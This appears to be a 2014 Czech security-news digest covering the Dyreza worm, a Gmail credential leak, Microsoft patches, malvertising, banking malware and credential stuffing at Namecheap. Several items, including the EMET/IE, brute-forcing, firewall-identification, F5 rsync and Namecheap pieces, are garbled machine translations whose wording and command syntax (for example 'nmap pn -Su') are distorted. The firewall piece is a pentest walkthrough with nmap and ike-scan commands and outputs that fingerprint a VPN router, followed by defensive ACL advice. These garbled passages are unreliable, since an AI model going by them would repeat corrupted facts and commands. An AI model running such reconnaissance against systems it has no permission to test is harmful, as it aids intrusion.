„V současné době nemáme žádný důkaz o tom, že tímto červem byl kdokoli z našich uživatelů postižen, avšak pokračujeme ve vyšetřování,“ dodala společnost. „Pokud zjistíme, že byl tímto červem nějaký uživatel napaden, spojíme se s ním a pomůžeme mu s provedením potřebných bezpečnostních opatření.“ Salesforce doporučuje, aby jeho uživatelé používali jím nabízenou funkci, která umožní přístup k jejich účtům pouze z prověřených korporátních sítí a VPN. Doporučeno je také zapnutí dvoufázového přihlašování pomocí mobilní aplikace Salesforce 1 a zapnutí upozornění na pokusy o přihlášení z neznámých počítačů pomocí SMS.
Zaujal vás tento článek? Přehled nejzajímavějších zpráv získáte odebíráním našeho newsletteru »

Dyreza není prvním červem, který se na Salesforce zaměřuje. V únoru tohoto roku výzkumníci z bezpečnostní společnosti Adallom objevili variantu známého trojského koně Zeus, jež byla upravena tak, aby stahovala firemní data z napadených účtů Salesforce.

„Toto upozornění je jen dalším budíčkem v řadě pro uživatele SaaS (Software-as-a-Service), kteří si musí uvědomit, že nemohou v otázkách zabezpečení dat spoléhat pouze na poskytovatele SaaS,“ uvedl Adallom nyní v reakci na oficiální prohlášení Salesforce. „Z pohledu Salesforce.com se nejedná o zranitelnost přímo v jeho službě, jelikož červ musí nejprve infikovat systém uživatele. Tudíž za krádež či smazání dat je z pohledu Salesforce zodpovědný pouze napadený uživatel.“


V září proběhne veletrh Prague Fire & Security Days 2014

11.9.2014 Konference
Šestý ročník veletrhu protipožární a zabezpečovací techniky, systémů a služeb FSDays 2014 se uskuteční ve dnech 16. – 20. září v PVA EXPO Praha v Letňanech. Opět proběhne souběžně s veletrhy FOR ARCH 2014.

V rámci veletrhu bude představena řada nových nebo inovovaných produktů z oboru zabezpečení, jako například:

Centr PCO bude na svém stánku prezentovat minialarm EPIR3 – plnohodnotné zabezpečovací zařízení v „samoinstalačním“ balíčku. Jde o ojedinělé zařízení typu „all in one“ s nativní možností připojení k PCO, jehož zprovoznění zvládne běžný uživatel sám.

Express Alarm Czech předvede novinky v oblasti průmyslové televize, například panoramatickou kameru Fisheye nebo analogovou technologii HD-TVI.

Firma Flajzar představí například prvky zabezpečovací techniky nebo komunikátory GSM.

Elfnet Group bude na veletrhu prezentovat inteligentní bezpečnostní systémy (ISS), které jsou inteligentním řešením automatizované videoanalýzy obrazu se specifickými pokročilými funkcemi – rozpoznávání registračních značek, zaznamenávání a rozeznávání obličejů, analýza plynulosti dopravy a dopravních nehod.

Jablotron Alarms rozšiřuje nabídku komponent svých systémů. Na veletrhu FSDays představí například novou ústřednu řady JA-100 s vestavěným komunikátorem LAN JA-101KR-LAN a pohybové detektory PIR systému Jablotron 100.

Hned několik novinek představí společnost Radom, například zařízení dálkového přenosu z ústředen EPS či EZS – vysílač STX23A a komunikátor GSM/LAN určený pro přenosy informací z ústředen EZS či EPS.

Společnost Safe 4U představí vojenské bezpilotní stroje a další vlastní produkty, ale předvede také přístrojové vybavení k hledání pasivních a aktivních odposlechových prostředků. Společnost je činná v profesionálním zajištění aktivní ochrany proti úniku informací.

Společnost Secar Bohemia pod svou vlastní značkou SHERLOG nabízí technologie zabezpečení vozidel, strojů, nemovitostí, úniku médií z potrubí, monitoring dopravních prostředků, zásilek, osob, až po zdraví a životní styl.

Sicurit CS přichází na veletrh se systémem SmartLiving, platformou EZS, na které je možné postavit systém domácí automatizace. Společnost bude dále prezentovat videodetekční systémy a záznamové servery pro vysokou bezpečnost.

Společnost Siemens představí produkty z oblasti požárních a bezpečnostních systémů.

Soutěž FSDays Award 2014

Pro všechny prezentující se společnosti je v letošním roce opět vyhlášena již tradiční prestižní soutěž o nejlepší exponát či službu FSDays Award 2014. Přihlášené exponáty bude hodnotit komise složená z odborníků bezpečnostního průmyslu. Hlavní cenou pro výherce je originální skleněná plastika navržená předním českým designérem Pavlem Šťastným.

Odborné konference a workshopy na aktuální témata

Návštěvníci se mohou těšit na řadu zajímavých témat odborných konferencí, workshopů a seminářů.

17. 9. – vzdělávací workshopy s praktickými ukázkami s mottem „Bezpečnost se mění z minuty na minutu...“

13:00 – 14:00 Dohledová centra
14:10 – 15:10 Způsob řízení bezpečnosti z pohledu jednotlivých bezpečnostních firem
15:20 – 16:20 Mechanické zábranné systémy

18. 9. se od 9:30 do 15:00 uskuteční konference se dvěma hlavními tematickými okruhy:

Bezpečnostní systémy a jejich verifikace
Falešné poplachy v systémech EPS – eliminace a jak jim předcházet,

Další informace získáte na stránkách www.fsdays.cz.


Na internetu se objevilo přes 5 miliónů gmailových adres a hesel

11.9.2014 Incidenty
Na jednom diskuzním fóru se objevil soubor obsahující téměř 5 miliónů emailových adres a k nim náležící přístupová hesla.

Soubor na fórum btcsec.com umístil uživatel vystupující pod přezdívkou tvskit s tím, že přes 60 % přístupových údajů je stále platných.

„Nemůžeme potvrdit, že je to přesně 60 %, ale velká část dat je skutečně funkční,“ řekl Peter Kruse z dánské bezpečnostní společnosti CSIS Security Group, která své služby poskytuje hlavně úřadům a finančním institucím.

Výzkumníci z CSIS data analyzovali a došli k závěru, že přístupové informace pocházejí hned z několika různých zdrojů, přičemž v několika případech došlo k jejich úniku již před 3 lety. „Domníváme se, že data nepocházejí přímo od Googlu. Pravděpodobně byla získána z různých zdrojů, jejichž zabezpečení bylo prolomeno,“ napsal Kruse v emailu.
Zaujal vás tento článek? Přehled nejzajímavějších zpráv získáte odebíráním našeho newsletteru »

Jinými slovy, velká část hesel pro uvedené gmailové adresy nefunguje, protože jde o data z jiných webových stránek, kde uživatelé jako přihlašovací jméno použili svou emailovou adresu, ale zvolili jiné heslo. Problém tak mohli či stále mohou mít hlavně uživatelé, kteří pro Gmail i účet na jiných webech používají stejné přístupové údaje.

„Bezpečnost našich uživatelů je pro nás nesmírně důležitá. Nic nenasvědčuje tomu, že by došlo k překonání našich bezpečnostních mechanismů,“ napsal ve svém vyjádření Google.

To, jestli je váš účet mezi postiženými, můžete zjistit například na adrese https://isleaked.com/en, kde je k dispozici i databáze nedávno napadených účtů ruských freemailů yandex.ru a mail.ru.


Zabezpečený mobilní chat nabídne AirWatch

11.9.2014 Mobil
AirWatch Chat, kontejnerizovanou aplikaci pro zabezpečené odesílání rychlých zpráv pro iOS a Android, představil VMware. Produkt lze integrovat s existujícími zdroji uživatelských adresářů pomocí rozhraní podobného nativním SMS pro bezpečnou a intuitivní výměnu zpráv v organizacích.

Zaměstnancům poskytuje komunikaci v reálném čase a oddělení IT schopnosti robustního zabezpečení a konformity. Schopnost bezpečné interní komunikace je přitom zvláště důležitá pro vysoce regulovaná odvětví a organizace uvědomující si bezpečnostní rizika.

Běžné spotřebitelské SMS firmám přitom bezpečnost vyžadovanou oddělením IT neposkytují. Posílat důvěrné nebo soukromé zprávy přes nezabezpečené aplikace tak vytváří potenciálně velké riziko.

Vlastnosti AirWatch Chat podle dodavatele:

Zabezpečení odesílání zpráv na podnikové úrovni, zahrnující šifrování na úrovni koncové zprávy, detekci důvěryhodného zařízení, integraci s jednotným přihlášením a ověřování na úrovni aplikace, šifrování dat v klidu a schopnost archivace zpráv pro audity dle potřeby.
Funkce pro prevenci ztráty dat, jako je omezení multimediálních zpráv, vypnutí funkcí kopírovat/vložit, zabránění snímkům obrazovky a omezení používání fotoaparátu.
Nativní uživatelské rozhraní, jež odráží SMS aplikace pro spotřebitele, včetně posloupnosti zpráv, stavu dostupnosti, načítání offline zpráv, potvrzení o doručení zprávy a obrázky uživatelského profilu.
Nastavení pro správce, jež umožní AirWatch Chat pouze přes Wi-Fi a použití v rámci nasazení SaaS (software jako služba) nebo v místní síti (on-premise).


EMET, AV Zveřejnění Leak Napájen ze sítě IE
10.9.2014 Viry

Provoz Sněhulák špionáž kampaň , který zamířil na vojenskou inteligenci v letošním roce přes Internet Explorer nulové den, odhalil slabinu v úsilí managementu zranitelnosti Microsoft. Co bylo jedinečné o provozu sněhulák je to, že v ceně kontrolu, zda je ohrožena počítač běžel Microsoft Enhanced Experience Toolkit (zmírnění Emet) , a pokud ano, tak by útok neprovede.

Jak se ukázalo, byli útočníci využívají informační zveřejnění chyby, které odhalil, zda EMET a jiné antimalware ochrany jsou aktivní. Dnes Microsoft podnikl kroky k uzavření této mezery ve své nejnovější kumulativní aktualizace pro Internet Explorer.

Kritická záplata je jedním ze čtyř dnes zveřejnila společnost Microsoft v rámci své měsíční Patch Tuesday bulletinů zabezpečení . IE aktualizace záplaty 37 zranitelných míst, včetně veřejně známých zveřejnění chyby. Zbývající tři bulletiny NET, Plánovač úloh systému Windows a Microsoft Lync, byly hodnoceny důležité společností Microsoft a pravděpodobně nemají vést ke vzdálenému spuštění kódu.

EMET je bezplatná sada nástrojů poskytované společností Microsoft, že středně velké a podnikové IT obchody nasadit jako dočasné provizorium pro zero-day zranitelnosti se využívá ve volné přírodě. Tato sada nástrojů poskytuje celou řadu využití snižující závažnost rizika, které chrání proti běžné paměťové zranitelnosti korupce. Zranitelnost oprava v IE umožní zdroje načten do paměti, které budou dotazovány, řekl Microsoft, čímž útočníkovi hlava je jako to, co ochrany běží na počítači.


IE patch MS14-052 , je nejvyšší prioritou bulletin pro IT obchodů v tomto měsíci, odborníci tvrdili.

"Tato oprava je Microsoft pokus omezit schopnost využít stavebnice, které byly identifikovány jako pomocí zpřístupnění informací techniku ​​k určení, zda byly nainstalovány zejména bezpečnostní software," řekl Craig Young, bezpečnostní výzkumník Tripwire. "Chyba umožní škodlivý webové stránky a zjistěte, zda je balík nainstalován software dotazem na dostupnost knihovny DLL, které tento software. Informace o aktivních bezpečnostních produktů na cíl je velmi užitečné pro útočníka; že jim umožňuje, aby se zabránilo zvyšování alarmy zasláním detekovatelné užitečné zatížení. "

Tato aktualizace také záplaty zranitelnosti v prohlížeči, se vrací do IE6 se systémem Windows Server prostřednictvím aktuální verze.

Další bulletin stojí za to sledovat, odborníci tvrdili, je MS14-054 , zvýšení úrovně oprávnění zabezpečení v Plánovači úloh. Aby bylo možné využít chybu, útočník by musel mít platná pověření a lokální přístup do postiženého systému, aby bylo možné řídit jejich využívání.

Tato chyba ovlivňuje Windows 8, Windows 8.1, Windows RT a Windows RT 8.1, stejně jako Windows Server 2012 a Windows Server 2012 R2.

"MS14-054 by měla být také vysoko na IT administrátoři seznam oprav jako Microsoft očekává, že spolehlivé Plánovač úloh využije vyvinutých v rámci jednoho měsíce," řekl Young. "Úspěšné zneužití této chyby zabezpečení by umožnil každému uživateli získat úplnou kontrolu nad postiženým systémem."

Microsoft také oprava zranitelnosti denial-of-service v jeho rámci NET. MS14-053 postihuje většinu verzí NET, a také ovlivňuje instalace ASP.NET, pokud je to povoleno v IIS.

"Zůstane-li unpatched, dálkové un-ověřen útočníci mohou posílat HTTP / HTTPS požadavek způsobit vyčerpání zdrojů, což v konečném důsledku povede k řešení-of-service stav na webovém serveru ASP.NET," řekl Amol Sarwate, ředitel zranitelnosti laboratoří na Qualys .

Konečný bulletin, MS14-055 , nášivky tři denial-of-service zranitelná místa poštovního serveru Microsoft Lync,.

"Tato aktualizace zabezpečení řeší chyby zabezpečení opravou způsobu Lync Server dezinfikuje vstup od uživatele a opravou cestu Lync Server zpracovává výjimky a null dereferences," uvedl Microsoft ve svém zpravodaji.

Microsoft také aktualizován tři potenciální bezpečnostní rizika upozorňováni dnes:

Poradní 2871997 aktualizace ochrana pověření a ovládací prvky ověřování domény pro systém Windows 7 a Windows Server 2008 R2. Tato aktualizace zajišťuje pověření jsou vyčištěna okamžitě, a nikoli v případě, že byly získány nové Kerberos TGT lístek.
Poradní 2905247 je aktualizace pro aplikaci Microsoft ASP.NET, že záplaty zvýšení úrovně oprávnění chybu ve stavu zobrazení ASP.NET, že jí byly poskytnuty v prosinci loňského roku. Jako dnešní aktualizace, aktualizace zabezpečení k dispozici prostřednictvím webu Microsoft Update kromě Download-Center-pouze možnosti stanovené v prosinci.
Poradní 2755801 je aktualizace pro aplikaci Adobe Flash Player ve verzi Internet Explorer s operačním systémem Windows 8 a Windows 8.1. Dnešní aktualizace je určena pro IE 10 na Windows 8, Windows Server 2012 a Windows RT, a IE 11 na Windows 8.1, Windows Server 2012 R2 a Windows RT 8.1.
- See more at: http://threatpost.com/emet-av-disclosure-leak-plugged-in-ie/108175#sthash.GZPGW5Y5.dpuf


Škodlivé reklamy zasáhly Amazon, YouTube i Yahoo, říká Cisco

10.9.2014 Hrozby
Obětmi sofistikované kampaně na šíření malwaru se podle společnosti Cisco stala řada populárních serverů. Reklama uživatele přesměruje na jinou webovou stránku, ze které se do jejich počítače automaticky stáhne škodlivý software. V ohrožení jsou jak uživatelé operačních systémů Windows, tak i platformy OS X od Applu. Výzkumníci škodlivou kampaň pojmenovali „Kyle and Stan“ podle jmen, která se objevila u subdomén více než 700 webových stránek, které útočníci využívají k šíření malwaru.

„Velký počet domén dovoluje útočníkům používat jednu konkrétní doménu pouze po omezenou dobu. Této domény se později zbaví a pro útoky začnou využívat jinou,“ napsal výzkumník společnosti Cisco Armin Pelkmann. Útočníci tímto současně obcházejí reputační bezpečnostní nástroje a blacklisty.
Zaujal vás tento článek? Přehled nejzajímavějších zpráv získáte odebíráním našeho newsletteru »

Výzkumníkům se zatím nepodařilo identifikovat reklamní síť, která uživatelům zobrazuje škodlivé reklamy. Některé z podvodných reklam se objevily na takových serverech, jako jsou YouTube, Amazon nebo Yahoo. Celkem se problém týká 74 domén. Vzhledem k vysoké návštěvnosti uvedených webů mohl počet postižených uživatelů dosáhnout velkých hodnot.

Některé ze stažených souborů obsahují také legitimní software jako třeba video přehrávač. K napadení uživatele dojde až po otevření stažených souborů. „Útočníci se spoléhají čistě na techniky sociálního inženýrství. Pomocí nich se snaží uživatele přesvědčit k instalaci softwarového balíčku,“ napsal Pelkmann.

Cisco na škodlivé reklamy narazilo již v květnu, ovšem narazit na ně lze i nyní. Podle společnosti nebude možné tuto síť zcela zničit, dokud nedojde i identifikaci jejích provozovatelů.


Odd Trvalé Heslo Bruteforcing

8.9.2014 Počítačový útok
To není nic nového, ale myslím, že to je často přehlížena, "pomalu a nízko" heslo brutální nutit.

Jeden z denních zpráv se mi líbí na pohled je heslo pokusy hrubou silou. více či méně "na věčné časy", pár sítí držet v těchto denních zpráv. Pokusy síly hesla hrubou nejsou nijak zvlášť agresivní, se obvykle méně než 10 pokusů za den z konkrétní IP adresy. Další zvláštní věc je, že účetní závěrka je brutální nuceni neexistují, což zvracet zaměření na "@ hotmail.com" účtů.

Zdaleka nejvíce agresivní síť 193.201.224.0/22,"Besthosting "na Ukrajině, po němž následuje jiné sítě Ukraining, 91.207.7.0/24 (Steephost).

Prvních brute nucené domény:

gmail.com
outlook.com
zfymail.com <- Tato doména je spojeno s mnoha roboty / spamových zpráv.
hotmail.com

V úmyslu, není zcela jasné, jak účty neexistují, a pokusy nejsou příliš agresivní (snad aby se zabránilo dostat uzamčen?).

Každý, kdo sleduje podobné útoky a schopni zjistit, co jsou po?


Identifikace Firewally z vnějšku-In. Nebo: "Je to zlato v nich Thar UDP porty!"
8.9.2014 Bezpečnost
V testu penetrace, často klíčem k obcházet bezpečnostní kontroly je tak jednoduché, jak věděl, identifikace platformy je implementováno na. Jinými slovy, je to mnohem jednodušší dostat přes něco, pokud víte, co to je. Například, často budete sondování sadu obvodových adres, a pokud neexistují žádné ohrožené hostitelé NAT-ED pro vás, můžete začít cítit, jako byste byli ve slepé uličce. Vědět, co tito hostitelé jsou by bylo opravdu užitečné, právě teď. Takže, co dělat dál?

Podívejte se na UDP, to je to, co. Docela často skenování UDP celý sortiment jednoduše vypálit hodiny nebo dny s ne mnoho, aby to stálo za to, ale pokud budete cílit prověřování pozorně, můžete často získat nějaké dobré informace ve spěchu.

Skenování NTP je skvělý start. Příliš mnoho lidí si neuvědomuje, že když uděláte síťové zařízení (směrovač nebo přepínač například) klienta NTP, často také z něj dělají NTP serveru stejně, a NTP servery rádi vám vše o sobě. Až příliš často, že port je ponechán otevřený, protože nikdo neví, zablokovat.

Další služby, které často obchází všechny ACL firewallu je firemní vzdálený přístup IPSec VPN speciálně IKE / ISAKMP (udp / 500). I když se jedná o obor firewall se site-to-site VPN do ústředí, často IKE je špatně nastaven, aby se vyhnula rozhraní ACL, nebo VPN na ústředí je povolen s dekou "Všechen" povolení pro IKE.

Pojďme se podívat na tyto dva ODPADU - budeme využijme Nmap kopat trochu hlouběji. Za prvé, pojďme vyhledat tyto porty:

nmap pn -Su -p123,500 --open xxxx
Spuštění Nmap 6.46 (http://nmap.org) v 2014-08-29 12:13 východoamerického času

Nmap skenování zpráva some.fqdn.name (xxxx)
hostitel je up (0.070s latence).
PORT STATE SERVICE
123 / udp open NTP
500 / udp open isakmp

Nmap provádí: 1 IP adresa (1 hostitel up) naskenovány 46,69 sekund

OK, tak jsme zjistili, otevřené porty UDP - jak to pomůže nám? Pojďme spustit druhou sadu prověřování proti těmto dvěma porty, počínaje rozšířením NMAP skenování použít ntp-info skript:

C: \> nmap pn -Su -p123 --open xxxx --script = ntp-info.nse

Spuštění Nmap 6,46 (http://nmap.org) v 2014-08-29 12:37 východoamerického času

Nmap skenování zpráva some.fqdn.name (xxxx)
hostitel je up (0.042s latence).
PORT STATE SERVICE
123 / udp open ntp
| ntp-info:
| obdrží časové razítko: 2014-08-29T16: 38: 51
| verze : 4
| Procesor: unknown
| systém: UNIX
| skok: 0
| stratum: 4
| přesnost: -27
| rootdelay: 43,767
| rootdispersion: 135,150
| peer: 37146
| refid: 172.16.10.1
| reftime: 0xD7AB23A5.12F4E3CA
| hlasování: 10
| Hodiny: 0xD7AB2B15.EA066B43
| stav: 4
| offset: 11,828
| kmitočet: 53,070
| jitter: 1,207
| šum: 6,862
| _ stabilita: 0,244

Nmap provádí: 1 IP adresa (1 hostitel up) naskenovány 48,91 sekund

Chybička se vloudila - ntp-info říká, nejen více o našem hostiteli, ale také popisuje NTP server, že to synchronizaci s - v tomto případě zkontrolujte, zda je IP hostitele v červené barvě - to je interní hostitele . Ve svých knihách, které mohou být přeformulována jako "další cílového hostitele", nebo možná ne-li dál, alespoň pokud jde o seznam "na později". Je zajímavé, že podpora NTP informací požaduje poloh tohoto hostitele pěkně působit jako NTP reflektoru / zesilovač, který pak může být použit v DDOS spoofing útoky. Odeslat / přijmout dávku je těsně pod 1: 7 (54 odeslaných bajtů, 370 přijaté), takže nic moc, ale to je ještě zesílení 7x které můžete zfalšovat.

Zpět na pentest - ntp-info nám dává nějaké dobré informace, není konkrétně nám říct, co OS náš cílový server běží, tak se pojďme podívat na další IKE, s detekcí služba aktivována:

C: \> nmap pn -Su -p500 -SV --open xxxx

Spuštění Nmap 6,46 (http://nmap.org) v 2014-08-29 13:10 východoamerického času

Nmap skenování zpráva pro some.fqdn.name (xxxx)
Hostitel je up (0.010s latence).
PORT STATE SERVICE
500 / udp open isakmp
Service Info: OS: IOS 12.3 / 12.4; CPE: CPE: / O: Cisco: iOS: 03/12-04/12

Detekce služba provedena. Nahlaste nám prosím jakékoliv nesprávné výsledky při http://nmap.org/submit/.
Nmap provádí: 1 IP adresu (1 hostitel up) naskenované v 159,05sekunda

Ah - velmi pěkné! Nmap nám správně říká, že toto zařízení je Cisco router (není ASA nebo jiné zařízení)

IKE-scan nástroj by nám mělo dát nějaké další informace IKE, zkusme to s několika různými možnostmi:

Základní verbose hodnotit (hlavní režim) nám nic:

C:> IKE-scan -v xxxx
DEBUG: pkt len = 336 bajtů, šířka pásma = 56000 bps, int = 52000 us
Spuštění ike-scan 1,9 s 1 počítačů (http://www.nta-monitor.com/tools/ike -scan /)
xxxx Informujte zpráva 14 (NO-NÁVRH zvolené) HDR = (CKY-R = ea1b111d68fbcc7d)

Ukončení IKE-scan 1,9: 1 hostitelů naskenované 0.041 sekund (24,39 hostitelé / s). 0 vrátil handshake; 1 vrátil informovat

Ditto, hlavní režim IKEv2:

C:> IKE-scan -v -2 xxxx
DEBUG: pkt len = 296 bajtů, šířka pásma = 56000 bps, int = 46285 nás
Spuštění ike-scan 1,9 s 1 hostiteli (http://www.nta-monitor.com/tools / IKE-scan /)
--- Protáhněte 1 z 3 dokončena
--- Protáhněte 2 z 3 dokončené
--- projít 3 z 3 dokončeno

Ukončení IKE-scan 1,9: 1 hostitelů naskenované do 2,432 sekundy (0,41 hostitelé / s). 0 vrátil handshake; 0 vrátil informovat

pouze s NAT-T, pořád nic:

C:> IKE-scan -v -nat-t xxxx
DEBUG: pkt len = 336 bajtů, šířka pásma = 56000 bps, int = 52000 us
Spuštění ike-scan 1,9 s 1 počítačů (http://www.nta-monitor.com / tools / IKE-scan /)
xxxx Informujte zprávy 14 (NO-NÁVRH zvolené) HDR = (CKY-R = ea1b111d8198ef48)

Ukončení IKE-scan 1,9: 1 hostitelů naskenované 0.038 sekund (26,32 hostitelé / s). 0 vrátil handshake; 1 vrátil informovat

Agresivní mód je však vítěz winnner-chicken-večeři!

C:> IKE-scan -v-A xxxx
DEBUG: pkt len = 356 bajtů, šířka pásma = 56000 bps, int = 54857 nás
Spuštění ike-scan 1,9 s 1 hostiteli (http://www.nta-monitor.com/tools / IKE-scan /)
xxxx Aggressive Mode Handshake vrátil HDR = (CKY-R = ea1b111d4f1622a2)
SA = (ENC = 3DES hash = SHA1 group = 2: modop1024 auth = PSK LifeType = sekundy LifeDuration = 2
8800) VID = 12f5f28c457168a9702d9fe274cc0100 (Cisco Jednota) VID = afcad71368a1f1c96b8
696fc77570100 (Mrtvý Peer Detection v1.0) VID = 1fdcb6004f1722a231f9e4f59b27b857 VI
D = 09002689dfd6b712 (Xauth) KeyExchange (128 bajtů) ID (Type = ID_IPV4_ADDR, Value = xxxx) kódové slovo (20 bajtů) Hash (20 bajtů)

Ukončení IKE-scan 1,9: 1 hostitelů naskenované do 0,068 sekund (14,71 hostitelé / s). 1 vrátil handshake; 0 vrátil informovat

Vidíme z toho, že vzdálená kancelář směrovač (to je to, co je toto zařízení), je konfigurován pro režim agresivní a Xauth - takže jinými slovy, je to pravděpodobně jméno uživatele a heslo spolu s předsdílený klíč pro ověření tunelu. Všimněte si, že IKE-scan identifikuje tento hostitele jako "jednoty Cisco", takže i když to nám dává nějaké nové informace, pro základní identifikaci zařízení, v tomto případě NMAP nám dala lepší informace.

Co byste měli udělat, aby se zabránilo skenování, jako je tento a využije na základě nich? ACL na rozhraní obvodové může v současné době končí s "popřít tcp jakékoliv žádný záznam" - zvážit přidání na "popírat udp jakékoliv jakékoli log", nebo ještě lépe, vyměňte ji za "deny ip jakékoliv jakékoli log". Povolení * přesně * to, co potřebujete, popírat všechno ostatní, a stejně tak důležité - LOG vše, co dostane odepřen. Přihlášení většina toho, co je povoleno také je také dobrý nápad - pokud jste někdy měli na řešení problému nebo pojíždět bezpečnostní události, aniž by kulatiny, jste již pravděpodobně dělat.

Přidáním několika honeypots do mixu je také hezké. Popírat ICMP často porazit skripty nebo povrchní skenování. Mnoho síťových zařízení může být nakonfigurován tak, aby detekovat skenování a "vyhýbat" hostitele skenování - to vyzkoušet nejprve však nechcete blokovat výrobní provoz při nehodě s aktivní kontrolou, jako je tato.

Našli jste něco, úhledný, co většina by jinak přezkoumaly společnou a relativně "bezpečné" protokol? Prosím, použijte náš deník sdílet svůj příběh!


F5 BigIP neověřené rsync Vulnerability
8.9.2014 Zranitelnosti
Důvod, proč jsem se rozhodl napsat tuto chybu není skutečnost, že je to velmi populární systém, nebo že existuje obrovské riziko zde. Hlavním důvodem je to, že mi připadala s jistou dávkou smutku, které budeme muset řešit tento problém v roce 2014 Například, našel jsem návod konfiguraci rsync z roku 1999, které doporučuje použití rsync přes ssh [1].

F5 využívá rsync pro synchronizaci konfigurace v případě, že pro vyrovnávání zatížení BigIP se používá v režimu vysoké dostupnosti. Je smutné, že rsync server, který se používá pro toto nevyžaduje žádné ověřování. Výsledkem je, že útočník může nahrávat a stahovat libovolné soubory. Proof of concept využít obrázky "authorized_keys" soubor umožňující útočníkovi ssh do zařízení a získání plného přístupu shell. Aby bylo zranitelné, rozhraní používá k synchronizaci zařízení musí být vystavena [2].

F5 dělal patch k dispozici [3].

Ale myslím, že lekce je větší než "Patch F5". Jedná se o nezapomínat historii. V mnoha z našich kurzů, stížnost je důvod, proč jsou některé starší zranitelnosti. Například naše " Zajištění Unix "třída se děje přes některé problémy s" r "služby, jako je" rsh "a jak automatizovat téměř cokoliv pomocí ssh.

Co byste měli udělat? Jako první krok, rychlé skenování v síti otevřených rsync servery (port 873 TCP). Dále, pokud používáte ssh, jak byste měli, podívejte se na to, jak se vám podaří ssh klíče, protože to je další velký problém. Jste udržet své tajné klíče v jedné (a pouze jeden), bezpečné místo? Myslíte si, používat různé klíče pro různé účely? To může být větší projekt vypracovat a realizovat správně.

[1] http://everythinglinux.org/rsync/
[2]
http://support.f5.com/kb/en-us/solutions/public/15000/200/sol15236.html


Česká spořitelna varovala před virem, který lidem vysává peníze z účtu

7.9.2014 Phishing | Viry
Na pozoru by se měli mít klienti České spořitelny. Jak upozornili zástupci banky, internetem koluje nový sofistikovaný počítačový virus, díky kterému se kybernetičtí zločinci dostanou na cizí účty. Problém jim nečiní ani zabezpečení transakcí prostřednictvím SMS zpráv.
„Počítač, který je napaden tímto virem, po přihlášení do internetového bankovnictví nabádá k instalaci bezpečnostní aplikace ‚OTPdirekt‘ do mobilních telefonů. Jde o podvodnou aplikaci, díky které se útočník snaží z napadeného mobilního telefonu získávat SMS zprávy včetně zpráv pro potvrzování transakcí,“ varovali zástupci České spořitelny.

Obrazovka s výzvou k instalaci bezpečnostní aplikace skutečně vypadá jako služba Servis24, je plně lokalizována do češtiny a obsahuje jen drobné pravopisné chyby. Uživatelé si tak snadno mohou virus splést se skutečným internetovým bankovnictvím spořitelny.
Podoba podvodné obrazovky nabízející instalaci bezpečnostní aplikace.

Podoba podvodné obrazovky nabízející instalaci bezpečnostní aplikace.
 

„Česká spořitelna podobnou bezpečnostní aplikaci v žádném případě nenabízí. Buďte obezřetní při používání vašeho internetového bankovnictví i mobilního telefonu. Jestliže se vám v internetovém bankovnictví nebo v mobilu nabídne instalace bezpečnostní mobilní aplikace, případně její aktivace, nereagujte na zobrazenou výzvu a neprovádějte instalaci nabízené aplikace do vašeho mobilního telefonu,“ doporučili zástupci banky.

Podobné triky zkouší kyberzločinci pravidelně
Na Českou spořitelnu se kvůli početné základně klientů zaměřují počítačoví piráti pravidelně. Na přelomu července a srpna se snažili například vylákat pomocí viru informace o platebních kartách.
Ukázka podvodné stránky
Ukázka podvodné stránky 3D Secure

„Po přihlášení k vašemu účtu se může zobrazit informační okno (viz obrázek výše), které vybízí k zadání CVV2/CVC2 kódu k vaší platební kartě pod záminkou aktivace služby 3D Secure. Česká spořitelna po klientech nikdy nepožaduje zadávání bezpečnostního CVV2/CVC2 kódu. Ten může být vyžadován pouze internetovým obchodníkem při platbě přes platební bránu,“ stojí ve varování České spořitelny.

„Službu 3D Secure klientům sice nabízíme, ovšem nabídka registrace v žádném okně samovolně nevyskakuje, klient si musí o aktivaci služby požádat sám,“ uzavřeli zástupci banky. Skutečnou podobu obrazovky s aktivací služby 3D Secure najdete na obrázku níže.

Ukázka skutečné stránky k aktivaci služby 3D Secure

Pokud uživatelé zaznamenali neobvyklé chování služby Servis 24, mohou se obrátit na bezplatnou informační linku České spořitelny 800 207 207.


Namecheap účty brute-přinucen CyberVor gangu?
6.9.2014 Incidenty
Kalifornie-založený registrátor domény a web hosting firma Namecheap byl terčem hackerů, společnosti VP hosting Matt Russell varoval v pondělí, a řekl, že útočníci se pomocí uživatelského jména a hesla data získaná z webů třetích stran hrubou silou svou cestu do účty svých zákazníků.

Russell řekl, že napadené přihlašovací údaje, které byly použity zkoumat účty pravděpodobně, které byly shromážděny v ruské společnosti CyberVor gangu, které mají údajně v rukou tolik jako 1,2 miliardy unikátních on-line přihlašovací údaje. Stále není jasné, proč se domnívají, že CyberVor gang - nebo jiný gang pomocí tohoto skrýš přihlašovací údaje -. je zapojen . "skupina za to pomocí uložených uživatelských jmen a hesel, aby simulovaly přihlášení webového prohlížeče pomocí falešné prohlížeče Tento software simuluje skutečné přihlašovací proces by uživatel použít v případě, že používáte Firefox / Safari / Chrome ke svému účtu Namecheap. Hackeři jdou přes jejich jméno / seznamu hesel a snaží se každý a každý, kdo se snaží a dostat se do uživatelských účtů Namecheap, "Russel sdílet . "Naprostá většina Tyto pokusy o přihlášení byly neúspěšné, protože údaje jsou nesprávné nebo staré a byly změněny hesla. Jako preventivní opatření jsme agresivně blokování IP adres, které se zdají být přihlášení pomocí ukradených dat heslem. Jsme také protokolování tyto IP adresy, a budou vyvážet pravidla blokování celé naší síti zcela eliminovat přístup do jakéhokoli systému nebo služby Namecheap, stejně jako výroba tato data k dispozici pro vymáhání práva. " Některé pokusy byly úspěšné, a společnost dočasně pozastaven se tato účetní závěrka a oznamování příslušných držitelů. "Naše brzy ukáže, že ti uživatelé, kteří používají stejné heslo pro svůj účet Namecheap, které jsou použity na jiných webových stránkách, jsou ti, kteří jsou zranitelní," dodal. "Tento útok slouží jako vhodnou příležitostí k připomenutí, že v netizens, neustále čelit nové a vyvíjející bezpečnostní hrozby. " poradil Russell všem uživatelům zvážit možnost ověření 2-faktor pro své on-line účtů kdykoli je to možné, aby se zabránilo tomuto typu útoku v budoucnosti. On také doporučuje používat silné hesla, které nepoužívají stejné uživatelské jméno / heslo kombinaci pro více různých webů, pravidelně snímací systémy pro malware, pomocí připojení SSL pro všechny webové stránky a používat zabezpečené připojení a sítě VPN při prohlížení internetu na otevřené Wi-Fi hotspot. "Máme rozhodla jít na veřejnost s dnešním incidentu, aby se pokusila vytvářet větší povědomí veřejnosti o otázkách bezpečnosti, které vyplývají z oblastí mimo naši kontrolu. Dobré zabezpečení je výsledkem společného úsilí mezi poskytovatelem služeb (USA) a zákazníkem (vy), "napsal a dodal, že dělají to, co je třeba udělat, aby si udržely zákazníky 